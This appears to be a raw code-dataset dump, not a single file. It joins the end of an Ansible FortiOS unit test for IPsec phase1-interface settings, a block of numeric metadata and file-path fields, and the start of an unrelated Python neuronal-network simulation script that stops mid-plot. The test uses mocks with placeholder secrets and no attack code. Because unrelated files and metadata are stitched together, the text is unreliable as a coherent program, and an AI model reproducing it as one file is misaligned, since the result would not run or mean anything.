def test_vpn_ipsec_phase1_interface_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'vpn_ipsec_phase1_interface': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_discovery_forwarder': 'enable',
'auto_discovery_psk': 'enable',
'auto_discovery_receiver': 'enable',
'auto_discovery_sender': 'enable',
'auto_negotiate': 'enable',
'banner': 'test_value_18',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_23',
'default_gw': 'test_value_24',
'default_gw_priority': '25',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '28',
'dns_mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd_retrycount': '32',
'dpd_retryinterval': 'test_value_33',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'encap_local_gw4': 'test_value_36',
'encap_local_gw6': 'test_value_37',
'encap_remote_gw4': 'test_value_38',
'encap_remote_gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation_address': 'ike',
'enforce_unique_id': 'disable',
'exchange_interface_ip': 'enable',
'exchange_ip_addr4': 'test_value_44',
'exchange_ip_addr6': 'test_value_45',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '48',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_50',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '53',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_56',
'ip_version': '4',
'ipv4_dns_server1': 'test_value_58',
'ipv4_dns_server2': 'test_value_59',
'ipv4_dns_server3': 'test_value_60',
'ipv4_end_ip': 'test_value_61',
'ipv4_name': 'test_value_62',
'ipv4_netmask': 'test_value_63',
'ipv4_split_exclude': 'test_value_64',
'ipv4_split_include': 'test_value_65',
'ipv4_start_ip': 'test_value_66',
'ipv4_wins_server1': 'test_value_67',
'ipv4_wins_server2': 'test_value_68',
'ipv6_dns_server1': 'test_value_69',
'ipv6_dns_server2': 'test_value_70',
'ipv6_dns_server3': 'test_value_71',
'ipv6_end_ip': 'test_value_72',
'ipv6_name': 'test_value_73',
'ipv6_prefix': '74',
'ipv6_split_exclude': 'test_value_75',
'ipv6_split_include': 'test_value_76',
'ipv6_start_ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local_gw': 'test_value_80',
'local_gw6': 'test_value_81',
'localid': 'test_value_82',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'monitor': 'test_value_87',
'monitor_hold_down_delay': '88',
'monitor_hold_down_time': 'test_value_89',
'monitor_hold_down_type': 'immediate',
'monitor_hold_down_weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate_timeout': '94',
'net_device': 'enable',
'passive_mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_102',
'ppk_secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret_remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_110',
'remote_gw6': 'test_value_111',
'remotegw_ddns': 'test_value_112',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_117',
'suite_b': 'disable',
'tunnel_search': 'selectors',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1_interface.fortios_vpn_ipsec(input_data, fos_instance)
delete_method_mock.assert_called_with('vpn.ipsec', 'phase1-interface', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_vpn_ipsec_phase1_interface_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1_interface': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_discovery_forwarder': 'enable',
'auto_discovery_psk': 'enable',
'auto_discovery_receiver': 'enable',
'auto_discovery_sender': 'enable',
'auto_negotiate': 'enable',
'banner': 'test_value_18',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_23',
'default_gw': 'test_value_24',
'default_gw_priority': '25',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '28',
'dns_mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd_retrycount': '32',
'dpd_retryinterval': 'test_value_33',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'encap_local_gw4': 'test_value_36',
'encap_local_gw6': 'test_value_37',
'encap_remote_gw4': 'test_value_38',
'encap_remote_gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation_address': 'ike',
'enforce_unique_id': 'disable',
'exchange_interface_ip': 'enable',
'exchange_ip_addr4': 'test_value_44',
'exchange_ip_addr6': 'test_value_45',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '48',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_50',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '53',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_56',
'ip_version': '4',
'ipv4_dns_server1': 'test_value_58',
'ipv4_dns_server2': 'test_value_59',
'ipv4_dns_server3': 'test_value_60',
'ipv4_end_ip': 'test_value_61',
'ipv4_name': 'test_value_62',
'ipv4_netmask': 'test_value_63',
'ipv4_split_exclude': 'test_value_64',
'ipv4_split_include': 'test_value_65',
'ipv4_start_ip': 'test_value_66',
'ipv4_wins_server1': 'test_value_67',
'ipv4_wins_server2': 'test_value_68',
'ipv6_dns_server1': 'test_value_69',
'ipv6_dns_server2': 'test_value_70',
'ipv6_dns_server3': 'test_value_71',
'ipv6_end_ip': 'test_value_72',
'ipv6_name': 'test_value_73',
'ipv6_prefix': '74',
'ipv6_split_exclude': 'test_value_75',
'ipv6_split_include': 'test_value_76',
'ipv6_start_ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local_gw': 'test_value_80',
'local_gw6': 'test_value_81',
'localid': 'test_value_82',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'monitor': 'test_value_87',
'monitor_hold_down_delay': '88',
'monitor_hold_down_time': 'test_value_89',
'monitor_hold_down_type': 'immediate',
'monitor_hold_down_weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate_timeout': '94',
'net_device': 'enable',
'passive_mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_102',
'ppk_secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret_remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_110',
'remote_gw6': 'test_value_111',
'remotegw_ddns': 'test_value_112',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_117',
'suite_b': 'disable',
'tunnel_search': 'selectors',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1_interface.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-discovery-forwarder': 'enable',
'auto-discovery-psk': 'enable',
'auto-discovery-receiver': 'enable',
'auto-discovery-sender': 'enable',
'auto-negotiate': 'enable',
'banner': 'test_value_18',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_23',
'default-gw': 'test_value_24',
'default-gw-priority': '25',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '28',
'dns-mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd-retrycount': '32',
'dpd-retryinterval': 'test_value_33',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'encap-local-gw4': 'test_value_36',
'encap-local-gw6': 'test_value_37',
'encap-remote-gw4': 'test_value_38',
'encap-remote-gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation-address': 'ike',
'enforce-unique-id': 'disable',
'exchange-interface-ip': 'enable',
'exchange-ip-addr4': 'test_value_44',
'exchange-ip-addr6': 'test_value_45',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '48',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_50',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '53',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_56',
'ip-version': '4',
'ipv4-dns-server1': 'test_value_58',
'ipv4-dns-server2': 'test_value_59',
'ipv4-dns-server3': 'test_value_60',
'ipv4-end-ip': 'test_value_61',
'ipv4-name': 'test_value_62',
'ipv4-netmask': 'test_value_63',
'ipv4-split-exclude': 'test_value_64',
'ipv4-split-include': 'test_value_65',
'ipv4-start-ip': 'test_value_66',
'ipv4-wins-server1': 'test_value_67',
'ipv4-wins-server2': 'test_value_68',
'ipv6-dns-server1': 'test_value_69',
'ipv6-dns-server2': 'test_value_70',
'ipv6-dns-server3': 'test_value_71',
'ipv6-end-ip': 'test_value_72',
'ipv6-name': 'test_value_73',
'ipv6-prefix': '74',
'ipv6-split-exclude': 'test_value_75',
'ipv6-split-include': 'test_value_76',
'ipv6-start-ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local-gw': 'test_value_80',
'local-gw6': 'test_value_81',
'localid': 'test_value_82',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'monitor': 'test_value_87',
'monitor-hold-down-delay': '88',
'monitor-hold-down-time': 'test_value_89',
'monitor-hold-down-type': 'immediate',
'monitor-hold-down-weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate-timeout': '94',
'net-device': 'enable',
'passive-mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_102',
'ppk-secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret-remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_110',
'remote-gw6': 'test_value_111',
'remotegw-ddns': 'test_value_112',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_117',
'suite-b': 'disable',
'tunnel-search': 'selectors',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1-interface', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_vpn_ipsec_phase1_interface_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1_interface': {
'random_attribute_not_valid': 'tag',
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_discovery_forwarder': 'enable',
'auto_discovery_psk': 'enable',
'auto_discovery_receiver': 'enable',
'auto_discovery_sender': 'enable',
'auto_negotiate': 'enable',
'banner': 'test_value_18',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_23',
'default_gw': 'test_value_24',
'default_gw_priority': '25',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '28',
'dns_mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd_retrycount': '32',
'dpd_retryinterval': 'test_value_33',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'encap_local_gw4': 'test_value_36',
'encap_local_gw6': 'test_value_37',
'encap_remote_gw4': 'test_value_38',
'encap_remote_gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation_address': 'ike',
'enforce_unique_id': 'disable',
'exchange_interface_ip': 'enable',
'exchange_ip_addr4': 'test_value_44',
'exchange_ip_addr6': 'test_value_45',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '48',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_50',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '53',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_56',
'ip_version': '4',
'ipv4_dns_server1': 'test_value_58',
'ipv4_dns_server2': 'test_value_59',
'ipv4_dns_server3': 'test_value_60',
'ipv4_end_ip': 'test_value_61',
'ipv4_name': 'test_value_62',
'ipv4_netmask': 'test_value_63',
'ipv4_split_exclude': 'test_value_64',
'ipv4_split_include': 'test_value_65',
'ipv4_start_ip': 'test_value_66',
'ipv4_wins_server1': 'test_value_67',
'ipv4_wins_server2': 'test_value_68',
'ipv6_dns_server1': 'test_value_69',
'ipv6_dns_server2': 'test_value_70',
'ipv6_dns_server3': 'test_value_71',
'ipv6_end_ip': 'test_value_72',
'ipv6_name': 'test_value_73',
'ipv6_prefix': '74',
'ipv6_split_exclude': 'test_value_75',
'ipv6_split_include': 'test_value_76',
'ipv6_start_ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local_gw': 'test_value_80',
'local_gw6': 'test_value_81',
'localid': 'test_value_82',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'monitor': 'test_value_87',
'monitor_hold_down_delay': '88',
'monitor_hold_down_time': 'test_value_89',
'monitor_hold_down_type': 'immediate',
'monitor_hold_down_weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate_timeout': '94',
'net_device': 'enable',
'passive_mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_102',
'ppk_secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret_remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_110',
'remote_gw6': 'test_value_111',
'remotegw_ddns': 'test_value_112',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_117',
'suite_b': 'disable',
'tunnel_search': 'selectors',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1_interface.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-discovery-forwarder': 'enable',
'auto-discovery-psk': 'enable',
'auto-discovery-receiver': 'enable',
'auto-discovery-sender': 'enable',
'auto-negotiate': 'enable',
'banner': 'test_value_18',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_23',
'default-gw': 'test_value_24',
'default-gw-priority': '25',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '28',
'dns-mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd-retrycount': '32',
'dpd-retryinterval': 'test_value_33',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'encap-local-gw4': 'test_value_36',
'encap-local-gw6': 'test_value_37',
'encap-remote-gw4': 'test_value_38',
'encap-remote-gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation-address': 'ike',
'enforce-unique-id': 'disable',
'exchange-interface-ip': 'enable',
'exchange-ip-addr4': 'test_value_44',
'exchange-ip-addr6': 'test_value_45',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '48',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_50',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '53',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_56',
'ip-version': '4',
'ipv4-dns-server1': 'test_value_58',
'ipv4-dns-server2': 'test_value_59',
'ipv4-dns-server3': 'test_value_60',
'ipv4-end-ip': 'test_value_61',
'ipv4-name': 'test_value_62',
'ipv4-netmask': 'test_value_63',
'ipv4-split-exclude': 'test_value_64',
'ipv4-split-include': 'test_value_65',
'ipv4-start-ip': 'test_value_66',
'ipv4-wins-server1': 'test_value_67',
'ipv4-wins-server2': 'test_value_68',
'ipv6-dns-server1': 'test_value_69',
'ipv6-dns-server2': 'test_value_70',
'ipv6-dns-server3': 'test_value_71',
'ipv6-end-ip': 'test_value_72',
'ipv6-name': 'test_value_73',
'ipv6-prefix': '74',
'ipv6-split-exclude': 'test_value_75',
'ipv6-split-include': 'test_value_76',
'ipv6-start-ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local-gw': 'test_value_80',
'local-gw6': 'test_value_81',
'localid': 'test_value_82',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'monitor': 'test_value_87',
'monitor-hold-down-delay': '88',
'monitor-hold-down-time': 'test_value_89',
'monitor-hold-down-type': 'immediate',
'monitor-hold-down-weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate-timeout': '94',
'net-device': 'enable',
'passive-mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_102',
'ppk-secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret-remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_110',
'remote-gw6': 'test_value_111',
'remotegw-ddns': 'test_value_112',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_117',
'suite-b': 'disable',
'tunnel-search': 'selectors',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1-interface', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| 40.690845
| 142
| 0.543241
| 5,850
| 57,781
| 4.991453
| 0.063932
| 0.160274
| 0.016438
| 0.020479
| 0.966301
| 0.963356
| 0.959075
| 0.9575
| 0.9575
| 0.9575
| 0
| 0.047297
| 0.305498
| 57,781
| 1,419
| 143
| 40.719521
| 0.680356
| 0.011492
| 0
| 0.971997
| 0
| 0
| 0.499869
| 0.073536
| 0
| 0
| 0
| 0
| 0.026529
| 1
| 0.005158
| false
| 0.022108
| 0.005895
| 0
| 0.011791
| 0.000737
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e04f3c12d804183e7146f65281d0c9691c84e65f
| 6,483
|
py
|
Python
|
src/Fig_2_supplement_3_Linear_networks_SSN_NTA.py
|
fmi-basel/gzenke-nonlinear-transient-amplification
|
f3b0c8c89b42c34f1aad740c7026865cf3164f1d
|
[
"MIT"
] | null | null | null |
src/Fig_2_supplement_3_Linear_networks_SSN_NTA.py
|
fmi-basel/gzenke-nonlinear-transient-amplification
|
f3b0c8c89b42c34f1aad740c7026865cf3164f1d
|
[
"MIT"
] | 3
|
2021-12-16T10:15:10.000Z
|
2021-12-16T12:54:24.000Z
|
src/Fig_2_supplement_3_Linear_networks_SSN_NTA.py
|
fmi-basel/gzenke-nonlinear-transient-amplification
|
f3b0c8c89b42c34f1aad740c7026865cf3164f1d
|
[
"MIT"
] | 1
|
2021-12-16T10:02:43.000Z
|
2021-12-16T10:02:43.000Z
|
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib import patches
import matplotlib.patches as mpatches
import scipy.io as sio
# plotting configuration
ratio = 1.5
figure_len, figure_width = 15*ratio, 12*ratio
font_size_1, font_size_2 = 36*ratio, 36*ratio
legend_size = 18*ratio
line_width, tick_len = 3*ratio, 10*ratio
marker_size = 15*ratio
plot_line_width = 5*ratio
hfont = {'fontname': 'Arial'}
# simulation setup
dt = 0.0001
T = int(9/dt)
# neuronal parameters
tau_e, tau_i = 0.020, 0.010
alpha_e, alpha_i = 1, 1
# short-term depression
x, u_d = 1, 1
tau_x = 0.20
# network connectivity
Jee = 1.8
Jie = 1.0
Jei = 1.0
Jii = 0.6
r_e, r_i = 0, 0
z_e, z_i = 0, 0
l_r_e, l_r_i, l_x = [], [], []
for i in range(T):
if 50000 <= i < 70000:
g_e, g_i = 2.0, 2
else:
g_e, g_i = 1.55, 2
g_e = g_e * (g_e > 0)
g_i = g_i * (g_i > 0)
# SSN part
z_e = Jee * x * r_e - Jei * r_i + g_e
z_i = Jie * r_e - Jii * r_i + g_i
z_e = z_e * (z_e > 0)
z_i = z_i * (z_i > 0)
r_e = r_e + (-r_e + np.power(z_e, alpha_e)) / tau_e * dt
r_i = r_i + (-r_i + np.power(z_i, alpha_i)) / tau_i * dt
r_e = r_e * (r_e > 0)
r_i = r_i * (r_i > 0)
x = x + ((1 - x) / tau_x - u_d * x * r_e) * dt
x = np.clip(x, 0, 1)
l_r_e.append(r_e)
l_r_i.append(r_i)
l_x.append(x)
l_r_e = np.asarray(l_r_e)
l_r_i = np.asarray(l_r_i)
l_x = np.asarray(l_x)
# plotting
plt.figure(figsize=(figure_len, figure_width))
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(True)
ax.spines['left'].set_visible(True)
for axis in ['top', 'bottom', 'left', 'right']:
ax.spines[axis].set_linewidth(line_width)
plt.tick_params(width=line_width, length=tick_len)
plt.yscale('symlog', linthreshy=0.1)
plt.plot(l_r_e, color='blue', linewidth=plot_line_width)
plt.plot(l_r_i, color='red', linewidth=plot_line_width)
plt.xticks(np.arange(30000, 90000 + 5000, 20000), np.arange(0, 6 + 0.5, 2), fontsize=font_size_1, **hfont)
plt.yticks([0, 1, 100, 10000], fontsize=font_size_1, **hfont)
plt.xlabel('Time (s)', fontsize=font_size_1, **hfont)
plt.ylabel('Firing rate (Hz)', fontsize=font_size_1, **hfont)
plt.xlim([30000, 90000])
plt.ylim([0, 10000])
plt.legend(['Exc', 'Inh'], prop={"family": "Arial", 'size': font_size_1}, loc='upper right')
plt.savefig('paper_figures/png/Revision_Fig_Point_Linear_network.png')
plt.savefig('paper_figures/pdf/Revision_Fig_Point_Linear_network.pdf')
# simulation setup
dt = 0.0001
T = int(9/dt)
# neuronal parameters
tau_e, tau_i = 0.020, 0.010
alpha_e, alpha_i = 2, 2
# network connectivity
Jee = 1.8
Jie = 2.0
Jei = 1.0
Jii = 1.0
r_e, r_i = 0, 0
z_e, z_i = 0, 0
l_r_e, l_r_i = [], []
for i in range(T):
if 50000 <= i < 70000:
g_e, g_i = 2.0, 2
else:
g_e, g_i = 1.55, 2
g_e = g_e * (g_e > 0)
g_i = g_i * (g_i > 0)
# SSN part
z_e = Jee * r_e - Jei * r_i + g_e
z_i = Jie * r_e - Jii * r_i + g_i
z_e = z_e * (z_e > 0)
z_i = z_i * (z_i > 0)
r_e = r_e + (-r_e + np.power(z_e, alpha_e)) / tau_e * dt
r_i = r_i + (-r_i + np.power(z_i, alpha_i)) / tau_i * dt
r_e = r_e * (r_e > 0)
r_i = r_i * (r_i > 0)
l_r_e.append(r_e)
l_r_i.append(r_i)
l_r_e = np.asarray(l_r_e)
l_r_i = np.asarray(l_r_i)
# plotting
plt.figure(figsize=(figure_len, figure_width))
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(True)
ax.spines['left'].set_visible(True)
for axis in ['top', 'bottom', 'left', 'right']:
ax.spines[axis].set_linewidth(line_width)
plt.tick_params(width=line_width, length=tick_len)
plt.yscale('symlog', linthreshy=0.1)
plt.plot(l_r_e, color='blue', linewidth=plot_line_width)
plt.plot(l_r_i, color='red', linewidth=plot_line_width)
plt.xticks(np.arange(30000, 90000 + 5000, 20000), np.arange(0, 6 + 0.5, 2), fontsize=font_size_1, **hfont)
plt.yticks([0, 1, 100, 10000], fontsize=font_size_1, **hfont)
plt.xlabel('Time (s)', fontsize=font_size_1, **hfont)
plt.ylabel('Firing rate (Hz)', fontsize=font_size_1, **hfont)
plt.xlim([30000, 90000])
plt.ylim([0, 10000])
plt.legend(['Exc', 'Inh'], prop={"family": "Arial", 'size': font_size_1}, loc='upper right')
plt.savefig('paper_figures/png/Revision_Fig_Point_SSN.png')
plt.savefig('paper_figures/pdf/Revision_Fig_Point_SSN.pdf')
# simulation setup
dt = 0.0001
T = int(9/dt)
# neuronal parameters
tau_e, tau_i = 0.020, 0.010
alpha_e, alpha_i = 2, 2
# short-term depression
x, u_d = 1, 1
tau_x = 0.20
# network connectivity
Jee = 1.8
Jie = 1.0
Jei = 1.0
Jii = 0.6
r_e, r_i = 0, 0
z_e, z_i = 0, 0
l_r_e, l_r_i, l_x = [], [], []
for i in range(T):
if 50000 <= i < 70000:
g_e, g_i = 2.0, 2
else:
g_e, g_i = 1.55, 2
g_e = g_e * (g_e > 0)
g_i = g_i * (g_i > 0)
# SSN part
z_e = Jee * x * r_e - Jei * r_i + g_e
z_i = Jie * r_e - Jii * r_i + g_i
z_e = z_e * (z_e > 0)
z_i = z_i * (z_i > 0)
r_e = r_e + (-r_e + np.power(z_e, alpha_e)) / tau_e * dt
r_i = r_i + (-r_i + np.power(z_i, alpha_i)) / tau_i * dt
r_e = r_e * (r_e > 0)
r_i = r_i * (r_i > 0)
x = x + ((1 - x) / tau_x - u_d * x * r_e) * dt
x = np.clip(x, 0, 1)
l_r_e.append(r_e)
l_r_i.append(r_i)
l_x.append(x)
l_r_e = np.asarray(l_r_e)
l_r_i = np.asarray(l_r_i)
l_x = np.asarray(l_x)
# plotting
plt.figure(figsize=(figure_len, figure_width))
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(True)
ax.spines['left'].set_visible(True)
for axis in ['top', 'bottom', 'left', 'right']:
ax.spines[axis].set_linewidth(line_width)
plt.tick_params(width=line_width, length=tick_len)
plt.yscale('symlog', linthreshy=0.1)
plt.plot(l_r_e, color='blue', linewidth=plot_line_width)
plt.plot(l_r_i, color='red', linewidth=plot_line_width)
plt.xticks(np.arange(30000, 90000 + 5000, 20000), np.arange(0, 6 + 0.5, 2), fontsize=font_size_1, **hfont)
plt.yticks([0, 1, 100, 10000], fontsize=font_size_1, **hfont)
